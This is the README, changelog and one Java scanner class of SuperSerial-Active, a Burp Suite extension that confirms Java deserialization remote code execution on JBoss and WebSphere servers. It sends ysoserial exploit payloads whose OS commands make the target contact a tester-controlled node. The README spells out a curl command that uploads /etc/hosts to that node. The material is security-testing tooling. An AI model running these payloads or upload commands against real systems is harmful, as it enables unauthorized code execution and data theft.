README.md
# SuperSerial-Active
SuperSerial-Active - Java Deserialization Vulnerability Active Identification Burp Extender

See Blog: https://www.directdefense.com/superserial-active-java-deserialization-active-identification-burp-extender/

To help our customers and readers definitively identify Java Deserialization vulnerabilities, we have created an additional Burp Suite Extender called “SuperSerial-Active” to compliment our previous release of "SuperSerial-Passive" (https://github.com/DirectDefense/SuperSerial) . Unlike the previous extender, which only passively identifies potential instances of Java deserialization vulnerabilities, this extender actively attempts to exploit the vulnerability in a non-intrusive way. This results in the confirmed identification of a deserialization vulnerability. The exploitation is made possible by making use of ysoserial library (https://github.com/frohoff/ysoserial). The Extender currently tests only against target systems running the JBoss or WebSphere platforms, but can detect the vulnerability on both Linux and Windows systems running JBoss or WebSphere. Support for detecting the vulnerability on systems running other platforms will be added in future releases of the extender.

## Extender Overview
SuperSerial-Active consists of two components, an extender to be loaded into Burp Suite Professional (superserial-active-[VERSION].jar) and a standalone web server Node (SuperSerial Node) written entirely in Java (SuperSerialNode-[VERSION].jar). The extender works by sending a request containing a serialized object exploit payload (generated by ysoserial) from the Burp Suite Active Scanner to the target system. The payload contains an operating system command that is intended to be executed by the target system (both Linux and Windows commands are attempted), specifically to have the target system access the SuperSerial Node via HTTP, or upload a local file to the SuperSerial Node via HTTP. After sending the exploit payload, the extender then communicates with the SuperSerial Node via HTTP to determine whether the Node was accessed by the target system, or if a file was uploaded by the target system. If the Node communicates that either of these events has taken place, the extender then creates a new Scan Issue in Burp Suite to confirm the vulnerability to the user.

## Extender Configuration/Usage:

1. Decide where the SuperSerial Node will be hosted.

	* the Node must be accessible directly by the target system (if target system is internet-facing, the node must be hosted with an internet-facing IP address or registered domain name).

	* the Node can be hosted on the same machine that is running Burp Suite, as long as the target system can access it directly.

	* the system running the Node must have Java Runtime Environment 7 or higher installed.

2. Download the SuperSerialNode-[VERSION].jar file on this system.

3. In a terminal, launch the SuperSerial Node:

	* The Node listens on port 15050 by default. To have the Node listen on another port, include the command-line argument --port=[PORT] where [PORT] specifies what port the Node will listen on (ex. java -jar SuperSerialNode.jar --port=8090).
	
	* All access to the Node is controlled by requiring all client requests to contain an authentication token GUID as a URL parameter (token=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX). This GUID is either generated at runtime or is specified by the user as a command-line argument (--token=[TOKEN]), and is outputted to the console immediately when the Node is started.
	
	* After termination, the Node does not remove any files that are created for storing uploaded files and access entries. By including the --resume command-line parameter, the Node can "resume" from previous executions and re-create contexts used successfully during these times.
	
4. The Node will print some information to the console after it has successfully launched. Take note of the Node Authentication Token that is printed to the terminal.
	
5. On the system running Burp Suite, download the latest superserial-active-[VERSION].jar and ysoserial-[VERSION]-all.jar files.

6. In the Extender->Options tab in Burp, check if the Java Environment Settings option is set.

	a. If the option is unset, create a new directory on the system and place the ysoserial-[VERSION]-all.jar file in this directory. Set the option to this newly-created directory
	
	b. If the option is already set, place the ysoserial-[VERSION]-all.jar file in the directory set in the option.

7. Load the superserial-active-[VERSION].jar file into Burp in the Extender->Extensions tab. The SuperSerial-Active extender will be loaded but will need to be configured before it can be used.

8. Configure the SuperSerial Node connection settings in the SuperSerial->"Node Connection Settings" tab.

	a. Set the Node Host. It must be set as the domain name or IP address that the target system will use to access the Node

		* Note: If the Node is hosted on the same machine as burp is running, the Node Host must be set to the IP address of this machine, NOT TO 127.0.0.1!

	b. Set the Node Port (the port the Node is listening on)

	c. Set the Node Token, which was printed to the console of the SuperSerial Node when it was launched.

	d. Click "Test Connection" and verify that the status pane indicates a successful connection, or change the settings based on the status pane message.

9. Configure Active Scan settings in the SuperSerial->"Scan Settings" tab.

	a. If desired, set the "Scan All" setting to scan all request parameters during active scanning.
		
		* WARNING: This will GREATLY increase the overall scan time per URL. Only enable this setting if needed.
	
	b. Configure download attempts and wait time:

		* After sending the serialized object exploit payload the extender accesses the node a maximum number of tries (5 by default), waiting a specified amount of time between each try (1.5 seconds by default).
		* Setting low values will allow the Active Scanner to finish more quickly but will increase the likelyhood of failing to detect the vulnerability, therefore higher values are recommended.
	
	c. Enable/Disable the desired ysoserial payload types
	
	d. Review the operating system commands listed that will be used during Active Scanning.
		
		* Additional commands can be added to the list that will be used during scanning. In order to detect the vulnerability, the added command must force the target system to access the Node via HTTP:
			* Commands can be autopopulated with node connection values using the following pre-defined tokens: [NODEHOST], [NODEPORT], [NODEPROTOCOL], [NODEPATH], [NODETOKEN]
			* ex. curl -X PUT --data-binary @/etc/hosts [NODEPROTOCOL]://[NODEHOST]:[NODEPORT][NODEPATH]?token=[NODETOKEN] will be automatically converted during scanning to: curl -X PUT --data-binary @/etc/hosts http://192.168.1.1:15050/FFFFFFFFFF?token=ABCDEF12-3456-7890-ABCD-EF1234567890
		* Commands are used during active scanning in the order they are listed in the table (top to bottom).
		* Commands that are intended to access the Node (but not upload a file) must also include the URL parameter 'write=true' (curl [NODEPROTOCOL]://[NODEHOST]:[NODEPORT][NODEPATH]?token=[NODETOKEN]&write=true)
	
10. Change filters in the Proxy and Target tabs to display "Other Binary". This will ensure any Scan Issues created by the extender will be displayed to the user.

11. Perform an active scan against any suspected vulnerable URLs. Additionally, the user can view the console output of the SuperSerial Node during the scan to view messages indicating any communication with the Node as it occurs, as well as to diagnose any potential issues. Any exceptions encountered by the extension during scanning (such as when generating payloads) will be printed to the Extender->Errors tab.

12. If a vulnerability is detected by the SuperSerial-Active extender, a new "Java Deserialization Vulnerability" Scan Issue will be created in Burp Suite. 

## Extender Dependencies:

* ysoserial (for creating serialized object exploit payloads): https://github.com/frohoff/ysoserial (supported versions: >=0.0.3)

* JSON for Java (for properly creating and parsing JSON in extender and Node): https://github.com/douglascrockford/JSON-java (included in release superserial-active-[VERSION].jar and SuperSerialNode-[VERSION].jar files, version 20160212 at time of writing)

## Extender Building Instructions:
Requires Java Development Kit 7 or higher

1. Choose folder to use for building (these instructions will use c:\test)

2. Create the following directories (case-sensitive):

	* c:\test\api
	
	* c:\test\build-extender
	
	* c:\test\build-node
	
3. Download the SuperSerial-Active master source zip and extract to directory c:\test (SuperSerial-Active-master directory and sub-directories will be created)

4. Download the Burp Extender interface files

	a. Launch Burp Suite and navigate to the Extender->APIs tab
	
	b. Click 'Save interface files' button
	
	c. In the save prompt, navigate to the c:\test\api directory and click 'Save'
	
5. Create directory (case sensitive): c:\test\api\org

6. Download the latest "JSON for Java" source code .zip file (https://github.com/douglascrockford/JSON-java/releases) and extract to directory: c:\test\api\org

7. Rename the newly extracted directory (JSON-java-[version]) to (case-sensitive): json

8. Copy all contents of the c:\test\api directory into: c:\test\SuperSerial-Active\Extender, overwrite any duplicate files

9. Copy all contents of the c:\test\api into: c:\test\SuperSerial-Active\Node, overwrite any duplicate files

10. Remove folder c:\test\api, it is no longer needed

11. Download the latest ysoserial (https://github.com/frohoff/ysoserial) release jar (ysoserial-0.0.4-all.jar at time of writing) to c:\test

12. To build the SuperSerial-Active Extender, do the following (this will create file c:\test\superserial-active.jar):

	a. In a terminal window, navigate to c:\test
	
	b. execute command: javac -cp ysoserial-0.0.4-all.jar -d build-extender -sourcepath SuperSerial-Active-master/Extender SuperSerial-Active-master/Extender/burp/\*.java SuperSerial-Active-master/Extender/superserial/settings/\*.java SuperSerial-Active-master/Extender/superserial/ui/\*.java
	
	c. execute command: jar vcf superserial-active.jar -C build-extender . -C SuperSerial-Active-master/Extender licenses/JSON-LICENSE.txt
	

CHANGELOG.md
# Change Log

## [0.5] (2016-11-22)
### Added
- Extender: Support for vulnerability detection using Burp Collaborator (HTTP only, HTTPS and DNS not yet supported)
- Extender: include parameter name in "Issue Detail" when payload is submitted via a paramter (ex. WebSphere)
- Extender: Support for including the ysoserial payload type in the detection command
- Extender: highlight index generation via InsertionPoint classes.
- Extender: Separate class specifically for generating ysoserial payloads (to be used by all Burp tools)
- Extender: Option in "Connection Settings" tab for Burp Collaborator or SuperSerial Node
- Extender: Warning of connection to outdated SuperSerial Node
- Extender: "Select All" and "Select None" buttons in "Scan Settings" tab for ysoserial payload types
- Node: Support for accepting the name of the ysoserial payload type via URL parameter (technique)

### Fixed
- Node: Resume capability now saves upload time, upload source, and ysoserial payload type name correctly.

### Changed
- Extender: Changed version number to 0.5
- Extender: Changed title of detected issue(s) to "Java Deserialization Remote Code Execution"
- Extender: Changed default detection commands to include the ysoserial payload type in the requests
- Extender: "Issue Remediation" section now includes links to actual remediation solutions.
- Node: Changed version number to 0.5

### Removed
- Extender: Single general ScanIssue class (SerializationRCEExploitIssue.java), replaced by general abstract parent class and specific sub-classes

## [0.4.0.1] (2016-11-11)
### Fixed
- Node: Standardized all message printouts

### Changed
- README.md: Updated ysoserial URL

## [0.4] (2016-7-27)
### Added
- Extender: Support for >=ysoserial-0.0.3
- Extender: Configuration checkboxes under "Scan Settings" to enable/disable ysoserial payload types
- Extender: Checking version of connected SuperSerial Node (via heartbeat request) and displaying in SuperSerial->"Node Connection Settings" tab
- Extender: Removal of generated context on Node (via DELETE request) after active scan where no vulnerability is identified
- Node: Include version information in responses to heartbeat requests
- Node: Output when context is removed (via DELETE request)
- Node: Token command line argument: use inputted token as authentication token
- Node: Resume capability: execute node and re-create contexts from previous executions by reading temporary files; enabled via --resume command line option
- Node: Help printout describing different command-line arguments

### Fixed
- Extender: Commands table in SuperSerial->"Scan Settings" tab can now be repopulated after all commands have been removed.
- Node: class imports in SuperSerialNodeHelper class (changed from * to specific classes)

### Changed
- Extender: Updated JSON for Java to version 20160212
- Node: Updated JSON for Java to version 20160212
- Node: Format of command-line arguments (--arg=val)
- Node: Message included in responses to heartbeat requests (South Park quote)
- Node: Filename format for temporary files storing uploaded files (SuperSerial-UF-[NODEPATH].tmp) and access entries (SuperSerial-AE-[NODEPATH].tmp)
- Node: Moved bytes-to-hex converstion method to SuperSerialNodeHelper class
- README.md: Updated Extender Description
- README.md: Updated Extender Overview
- README.md: Updated Extender Configuration/Usage (Node command-line arguments, loading ysoserial via Burp settings, enabling/disabling payload types, adding/editing commands)
- README.md: Updated Extender Dependencies
- README.md: Updated Extender Building Instructions
- CHANGELOG.md: Updated

### Removed
- Extender: Requirement to recompile ysoserial and package it with the Extender (Extender/ysoserial/GeneratePayload.java)
- Extender: ysoserial license (due to above) (Extender/licenses/YSOSERIAL-LICENSE.TXT)

## [0.3.1] (2016-5-3)
### Fixed
- Node: Uploaded file/access entries now saved to correct directory on *nix systems.

### Changed
- CHANGELOG.md: Updated

## [0.3] (2016-3-10)
### Fixed
- Node: Standardized output of failed requests ("XXX request denied ...")

### Added
- Extender: Sub-tabs "Node Connection Settings" and "Scan Settings" Under SuperSerial tab.
- Extender: Setting (under SuperSerial->"Scan Settings") to automatically active scan all listed (by Burp) request parameters and JBoss insertion point when performing Active Scan.
- Extender: Allow users to add new or edit/delete existing operating system commands used during Active Scan (under SuperSerial->"Scan Settings").
- Extender: Allow users to re-arrange the order that operating system commands are testing during Active Scan.
- Node: Allow users to remove dynamically-generated contexts by sending DELETE request to context.

### Changed
- Extender: Moved all Node connection configuration settings to SuperSerial->"Node Connection Settings" sub-tab.
- Extender: Moved all Active Scan settings to SuperSerial->"Scan Settings" sub-tab.
- README.md: Updated build procedure
- CHANGELOG.md: Updated

## [0.2.1] (2016-1-25)
### Fixed
- Node: IP Address printout (now displaying the correct IPs when files/access entries are downloaded).

### Added
- Node: printouts now preceded by timestamps

Extender/burp/NodeScannerCheck.java
/*
	NodeScannerCheck.java
	
	0.5 (11/22/2016)
	
	Active Scan check to detect Java Deserialization Remote Code Execution using the SuperSerial Node.
*/

package burp;

import java.util.Hashtable;
import java.util.Iterator;
import java.util.List;
import java.util.ArrayList;
import java.util.Properties;
import java.util.Arrays;
import java.io.OutputStream;
import java.io.ByteArrayOutputStream;
import java.io.PrintStream;
import java.net.URL;

import org.json.JSONObject;

public class NodeScannerCheck extends SuperSerialScannerCheck {
	private IHttpService nodeHttpService;
	
	private static final String JBOSS_INSERTION_POINT = "SuperSerial-JBoss";
	private static final String WEBSPHERE_INSERTION_POINT = "SuperSerial-WebSphere";
	
	public NodeScannerCheck(IBurpExtenderCallbacks cb) {
		super(cb);
		nodeHttpService = null;
	}
	
	@Override
	public int consolidateDuplicateIssues(IScanIssue existingIssue,IScanIssue newIssue) {
		return -1;
	}
	
	@Override
	public List<IScanIssue> doActiveScan(IHttpRequestResponse baseRequestResponse,IScannerInsertionPoint insertionPoint) {
		List<IScanIssue> issues = null;
		String ipName = insertionPoint.getInsertionPointName();
		String nodePath = null;
		String token = settings.getNodeToken();
		
		if(!settings.getNodeCollaborator() && (ipName.equals(JBOSS_INSERTION_POINT) || ipName.equals(WEBSPHERE_INSERTION_POINT))) { //insertion point is SuperSerial custom insertion point
			
			IRequestInfo reqInfo = helpers.analyzeRequest(baseRequestResponse);
			URL url = reqInfo.getUrl();
			String urlStr = url.getProtocol()+"://"+url.getHost()+":"+url.getPort()+url.getPath();
			if(!createNodeHttpService()) { //node settings invalid
				callbacks.printError("Active Scans check skipped on "+urlStr+" due to invalid Node connection settings! Set settings in the "+settings.getTabCaption()+"->\"Node Connection Settings\" tab and click \"Test Connection\"!");
				callbacks.issueAlert("Invalid SuperSerial Node connection settings! Active Scans check will be skipped on "+url.getPath()+"! Set settings in the "+settings.getTabCaption()+"->\"Node Connection Settings\" tab and click \"Test Connection\"!");
				return issues;
			}
			String host = settings.getNodeHost();
			int port = settings.getNodePort();
			boolean https = settings.getNodeHttps();
			token = settings.getNodeToken();
			int downloadTries = settings.getDownloadTries();
			int waitTime = settings.getWaitTime();
			
			//request #1: create node context
			byte[] req = getNodeGetRequest("/queue",token);
			IHttpRequestResponse queueRR = callbacks.makeHttpRequest(nodeHttpService,req);
			byte[] resp = queueRR.getResponse();
			IResponseInfo respInfo = null;
			if(resp!=null) {
				respInfo = helpers.analyzeResponse(resp);
			} else { //connection to node failed (error/timeout)
				callbacks.printError("Active Scan checks aborted on "+urlStr+" due to failed failed Node Connection. Set settings in the "+settings.getTabCaption()+"->\"Node Connection Settings\" tab and click \"Test Connection\"!");
				callbacks.issueAlert("Connection to Node failed during scanning! Active Scan checks on "+url.getPath()+" will be aborted! Set settings in the "+settings.getTabCaption()+"->\"Node Connection Settings\" tab and click \"Test Connection\"!");
				//configTab.setStatusError(SuperSerialConfigTab.CONN_ERROR_CODE,host,port,https,true);
				return issues;
			}
			if(respInfo!=null && respInfo.getStatusCode()==200) { //queue request completed successfully
				//copy response data to string
				int dataStart = respInfo.getBodyOffset();
				byte[] dataArray = new byte[resp.length-dataStart];
				int i=dataStart;
				int j=0;
				while(i<resp.length) {
					dataArray[j] = resp[i];
					i++;
					j++;
				}
				String data = new String(dataArray);
				
				//parse response JSON
				JSONObject jsonObj = new JSONObject(data);
				nodePath = (String) jsonObj.get("path");
				
				if(nodePath==null) { //if Node does not return a context to use (maybe not a node afterall?), issue error alert and abort active scan
					callbacks.printError("Active Scans check skipped on "+urlStr+" due to invalid Node connection settings (configured node web server not a node)! Set settings in the "+settings.getTabCaption()+"->\"Node Connection Settings\" tab and click \"Test Connection\"!");
					callbacks.issueAlert("Invalid SuperSerial Node connection settings (configured node web server not a node)! Active Scans check will be skipped! Set settings in the "+settings.getTabCaption()+"->\"Node Connection Settings\" tab and click \"Test Connection\"!");
					return issues;
				}
				
				//get list of commands to test, issue error alert and abort active scan if empty
				Hashtable[] commands = pcf.getCommandsArray();
				if(commands.length==0) {
					callbacks.printError("Active Scans check skipped on "+urlStr+" due to invalid scan settings (no commands to test with)! Add at least one command in the "+settings.getTabCaption()+"->\"Scan Settings\" tab!");
					callbacks.issueAlert("Invalid SuperSerial scan settings: no commands to test! Active scan checks will be skipped! Add at least one command in the "+settings.getTabCaption()+"->\"Scan Settings\" tab!");
					return issues;
				}
				
				//get list of enabled payload types, issue error alert and abort active scan if none enabled
				String[] payloadTypes = ptf.getEnabledTypes();
				if(payloadTypes.length==0) {
					callbacks.printError("Active Scans check skipped on "+urlStr+" due to invalid scan settings (no payload types enabled)! Enable at least one payload type in the "+settings.getTabCaption()+"->\"Scan Settings\" tab!");
					callbacks.issueAlert("Invalid SuperSerial scan settings: no payload types enabled! Active scan checks will be skipped! Enable at least one payload type in the "+settings.getTabCaption()+"->\"Scan Settings\" tab!");
					return issues;
				}
				
				boolean nodeConnError = false; //whether a connection error/timeout occurred during scanning
				for(i=0;!nodeConnError && i<payloadTypes.length;i++) { //loop through payload types
					
					for(j=0;!nodeConnError && j<commands.length;j++) { //loop through commands, stop if node access/file upload is detected
						String technique = payloadTypes[i];
						Hashtable cmdHT = commands[j];
						String cmd = (String) cmdHT.get("cmd");
						cmd = makeCommand(cmd,nodeHttpService.getProtocol(),nodeHttpService.getHost(),nodeHttpService.getPort(),nodePath,token,technique);
						//callbacks.printError(urlStr+":\n\tType: "+technique+"; cmd: "+cmd);
						
						//Request #2: create payload using current technique, and send to target host
						byte[] payload = generator.generatePayload(technique,cmd);
						if(payload.length==1) { //payload generation failed, move onto next command
							continue;
						}
						req = insertionPoint.buildRequest(payload);
						//callbacks.printError((new String(req))+"\n\n");
						IHttpRequestResponse exploitRR = callbacks.makeHttpRequest(baseRequestResponse.getHttpService(),req);
						//callbacks.printError(new String(exploitRR.getResponse()));
						
						//create exploit request highlights (content-type (if applicable) and command), but do not apply until vuln is confirmed
						List<int[]> expReqHighlights = null;
						String param = null;
						String encoding = null;
						String platform = null;
						int cmdStart = helpers.indexOf(req,cmd.getBytes(),true,0,req.length); //check for clear-text command
						if(cmdStart>-1) {
							expReqHighlights = new ArrayList<int[]>(2);
							int ctStart = helpers.indexOf(req,JBossSerializedInsertionPoint.CONTENT_TYPE.getBytes(),true,0,req.length); //check for java-serialized-object content-type header
							if(ctStart>-1) {
								expReqHighlights.add(new int[] {ctStart,ctStart+JBossSerializedInsertionPoint.CONTENT_TYPE.length()});
							}
							expReqHighlights.add(new int[] {cmdStart,cmdStart+cmd.length()});
							platform = "JBoss";
						} else {
							String encodedPayload = helpers.base64Encode(payload);
							cmdStart = helpers.indexOf(req,encodedPayload.getBytes(),true,0,req.length); //check for base64-encoded payload object
							if(cmdStart>-1) {
								expReqHighlights = new ArrayList<int[]>(1);
								expReqHighlights.add(new int[] {cmdStart,cmdStart+encodedPayload.length()});
								platform = "WebSphere";
								encoding = "base64";
								param = insertionPoint.getBaseValue(); //get parameter name where payload is inserted after encoding
							} else {
								encodedPayload = helpers.urlEncode(encodedPayload);
								cmdStart = helpers.indexOf(req,encodedPayload.getBytes(),true,0,req.length);
								if(cmdStart>-1) {
									expReqHighlights = new ArrayList<int[]>(1);
									expReqHighlights.add(new int[] {cmdStart,cmdStart+encodedPayload.length()});
									platform = "WebSphere";
									encoding = "base64";
									param = insertionPoint.getBaseValue(); //get parameter name where payload is inserted after encoding
								} else { //other encoding methods can be added here (such as full URL-Encode)
									
								}
							}
						}
						expReqHighlights = sortHighlightIndexList(expReqHighlights); //ensure that request highlights list is ordered correctly
						
						//create exploit response highlight (server header), but do not apply unless vuln is confirmed
						List<int[]> expRespHighlights = null;
						IResponseInfo expRespInfo = helpers.analyzeResponse(exploitRR.getResponse());
						String serverHeader = null;
						int ind = -1;
						List<String> expRespHeaders = expRespInfo.getHeaders();
						Iterator<String> expRespHeadersItr = expRespHeaders.iterator();
						while(expRespHeadersItr.hasNext()) {
							String header = expRespHeadersItr.next();
							if(header!=null && header.contains(platform)) {
								ind = header.indexOf(platform);
								serverHeader = header.substring(ind);
								break;
							}
						}
						if(serverHeader!=null) {
							expRespHighlights = new ArrayList<int[]>(1);
							ind = helpers.indexOf(exploitRR.getResponse(),serverHeader.getBytes(),true,0,exploitRR.getResponse().length);
							if(ind>-1) {
								expRespHighlights.add(new int[] {ind,ind+serverHeader.length()});
							}
						}
						expRespHighlights = sortHighlightIndexList(expRespHighlights); //ensure that response highlights list is ordered correctly
						
						//Request #3: loop to retrieve uploaded file or access entry
						IHttpRequestResponse fileRR = null;
						int tryCount=0;
						boolean downloaded = false; //if file was successfully downloaded from node
						while(!downloaded && tryCount<downloadTries) {
							try {
								Thread.sleep(waitTime);
							} catch(Exception e) {
								//don't care, wait time will not be used this time
							}
							req = getNodeGetRequest(nodePath,token);
							fileRR = callbacks.makeHttpRequest(nodeHttpService,req);
							resp = fileRR.getResponse();
							respInfo = null;
							if(resp!=null)
								respInfo = helpers.analyzeResponse(resp); 
							if(resp!=null && respInfo!=null) {
								if(respInfo.getStatusCode()==200) {
									downloaded = true;
									break;
								}
							} else { //error making request to node (timeout or failure)
								callbacks.printError("Active Scan checks aborted on "+urlStr+" due to failed failed Node Connection. Set settings in the "+settings.getTabCaption()+"->\"Node Connection Settings\" tab and click \"Test Connection\"!");
								callbacks.issueAlert("Connection to Node failed during scanning! Active Scan checks on "+url.getPath()+" will be aborted! Set settings in the "+settings.getTabCaption()+"->\"Node Connection Settings\" tab and click \"Test Connection\"!");
								//configTab.setStatusError(SuperSerialConfigTab.CONN_ERROR_CODE,host,port,https,true);
								nodeConnError = true;
								break;
							}
							tryCount++;
						}
						
						if(downloaded) { //data was downloaded from node, check if data is expected
							issues = new ArrayList<IScanIssue>(1);
							
							boolean expected = Boolean.parseBoolean((String) cmdHT.get("upload")); //whether uploaded file (true) or access entry (false) is expected
							boolean uploaded = false; //whether data read from node is uploaded file (true) or access entry (false)
							
							//determine whether data read is uploaded file or access entry by reading response headers
							List<String> respHeaders = respInfo.getHeaders();
							Iterator<String> headersItr = respHeaders.iterator();
							String source = null;
							String time = null;
							while(headersItr.hasNext()) {
								String header = headersItr.next();
								String[] headerSplit = null;
								if(header.contains("Upload-")) { //if response contains Upload-Source and Upload-Time headers, uploaded file was downloaded
									headerSplit = header.split(":",2);
									if(source==null & headerSplit[0].equalsIgnoreCase("Upload-Source") && headerSplit.length>1) {
										source = headerSplit[1].trim();
										uploaded = true;
									} else if(time==null && headerSplit[0].equalsIgnoreCase("Upload-Time") && headerSplit.length>1) {
										time = headerSplit[1].trim();
										uploaded = true;
									}
								} else if(header.contains("Content-")) { //if response contains "Content-Type: application/json" header, access entry was downloaded
									headerSplit = header.split(":",2);
									if(headerSplit[0].equalsIgnoreCase("Content-Type") && headerSplit.length>1) {
										headerSplit[1] = headerSplit[1].trim();
										if(headerSplit[1].equalsIgnoreCase("application/json")) {
											uploaded = false;
										}
									}
								}
							}
							
							if(expected==uploaded) { //if data downloaded was as expected: vuln confirmed, report vuln
								//if data is access entry, parse JSON
								if(!uploaded) {
									dataStart = respInfo.getBodyOffset();
									dataArray = new byte[resp.length-dataStart];
									int k=dataStart;
									int l=0;
									while(k<resp.length) {
										dataArray[l] = resp[k];
										k++;
										l++;
									}
									jsonObj = new JSONObject(new String(dataArray));
									source = (String) jsonObj.get("accessSource");
									time = (String) jsonObj.get("accessTime");
								}
								
								//create properties list for issue creation
								Properties issueDetailProps = new Properties();
								issueDetailProps.setProperty("node_type","SuperSerial Node");
								issueDetailProps.setProperty("node_location",host);
								issueDetailProps.setProperty("command",cmd);
								issueDetailProps.setProperty("technique",technique);
								issueDetailProps.setProperty("source",source);
								issueDetailProps.setProperty("time",time);
								issueDetailProps.setProperty("platform",platform);
								issueDetailProps.setProperty("os",(String) cmdHT.get("os"));
								if(uploaded) {
									issueDetailProps.setProperty("upload1"," and upload a file to");
									issueDetailProps.setProperty("upload2"," containing a file");
								} else {
									issueDetailProps.setProperty("upload1","");
									issueDetailProps.setProperty("upload2","");
								}
								if(param!=null) issueDetailProps.setProperty("parameter",param);
								if(encoding!=null) issueDetailProps.setProperty("encoding",encoding);
								
								//create node response highlight indices
								List<int[]> nodeRespHighlightsList = null;
								int srcStart = helpers.indexOf(resp,source.getBytes(),true,0,resp.length);
								if(srcStart>-1) { //source found
									nodeRespHighlightsList = new ArrayList<int[]>(4);
									nodeRespHighlightsList.add(new int[] {srcStart,srcStart+source.length()});
								}
								int timeStart = helpers.indexOf(resp,time.getBytes(),true,0,resp.length);
								if(timeStart>-1) { //time found
									if(nodeRespHighlightsList==null) nodeRespHighlightsList = new ArrayList<int[]>(3);
									nodeRespHighlightsList.add(new int[] {timeStart,timeStart+time.length()});
								}
								int techStart = helpers.indexOf(resp,technique.getBytes(),true,0,resp.length);
								if(techStart>-1) { //technique found
									if(nodeRespHighlightsList==null) nodeRespHighlightsList = new ArrayList<int[]>(2);
									nodeRespHighlightsList.add(new int[] {techStart,techStart+technique.length()});
								}
								if(uploaded) { //if data is uploaded file, highlight file
									nodeRespHighlightsList.add(new int[] {respInfo.getBodyOffset(),resp.length});
								}
								nodeRespHighlightsList = sortHighlightIndexList(nodeRespHighlightsList); //ensure that response highlights list is ordered correctly
								
								//create highlighted request/response and create issue
								IHttpRequestResponseWithMarkers exploitRRWM = callbacks.applyMarkers(exploitRR,expReqHighlights,expRespHighlights);
								IHttpRequestResponseWithMarkers fileRRWM = callbacks.applyMarkers(fileRR,null,nodeRespHighlightsList);
								if(encoding == null) { //payload not encoded
									BinaryPayloadIssue issue = new BinaryPayloadIssue(callbacks,exploitRRWM,fileRRWM,issueDetailProps);
									issues.add(issue);
								} else { //payload encoded
									EncodedPayloadIssue issue = new EncodedPayloadIssue(callbacks,exploitRRWM,fileRRWM,issueDetailProps);
									issues.add(issue);
								}
								return issues;
							}
						}
					}
				}
			} else { //queue request failed (wrong token)
				callbacks.printError("Active Scan checks aborted on "+urlStr+" due to failed Node Authentication. Set correct token in the "+settings.getTabCaption()+"->\"Node Connection Settings\" tab and click \"Test Connection\"!");
				callbacks.issueAlert("Authentication to Node failed during scanning! Active Scan checks on "+url.getPath()+" will be aborted! Set correct token in the "+settings.getTabCaption()+"->\"Node Connection Settings\" tab and click \"Test Connection\"!");
				//configTab.setStatusError(SuperSerialConfigTab.AUTH_ERROR_CODE,host,port,https,true);
			}
		}
		
		//if this point is reached (no vulnerability detected), attempt to delete context on Node that was created for current scan.
		if(nodePath != null) {
			byte[] req = getNodeDeleteRequest(nodePath,token);
			IHttpRequestResponse queueRR = callbacks.makeHttpRequest(nodeHttpService,req);
		}
		return issues;
	}
	
	//create HTTP GET request to node
	private byte[] getNodeGetRequest(String nodePath,String nodeToken) {
		if(nodePath.charAt(0)!='/') nodePath = "/"+nodePath;
		String request = "GET "+nodePath+"?token="+nodeToken+" HTTP/1.1\r\nHost: "+nodeHttpService.getHost()+":"+Integer.toString(nodeHttpService.getPort())+"\r\n\r\n";
		return request.getBytes();
	}
	
	//create HTTP DELETE request to node
	private byte[] getNodeDeleteRequest(String nodePath,String nodeToken) {
		if(nodePath.charAt(0)!='/') nodePath = "/"+nodePath;
		String request = "DELETE "+nodePath+"?token="+nodeToken+" HTTP/1.1\r\nHost: "+nodeHttpService.getHost()+":"+Integer.toString(nodeHttpService.getPort())+"\r\n\r\n";
		return request.getBytes();
	}
	
	//create new httpservice to be used for requests to node
	//false: failure creating new httpservice
	//true: success creating new httpservice (or identical httpservice already created)
	private boolean createNodeHttpService() {
		String host = settings.getNodeHost();
		int port = settings.getNodePort();
		boolean https = settings.getNodeHttps();
		
		if((host==null) || ((port<1) || (port>65535))) { //node settings not yet set or set incorrectly
			return false;
		} else if(host.isEmpty() || ((port<1) || (port>65535))) { //node settings not set correctly
			return false;
		}
		
		if(nodeHttpService==null) { //HttpService object not yet created, attempt to create			
			nodeHttpService = helpers.buildHttpService(host,port,https);
		} else { //HttpService object already created, compare to inputted settings and recreate if different
			String currHost = nodeHttpService.getHost();
			int currPort = nodeHttpService.getPort();
			String currHttps = nodeHttpService.getProtocol();
			if(!(currHost.equals(host) && (currPort==port) && (currHttps.equalsIgnoreCase("http"+(https ? "s" : ""))))) { //if already-created object is set differently than current settings
				nodeHttpService = helpers.buildHttpService(host,port,https);
			}
		}
		return true;
	}
}
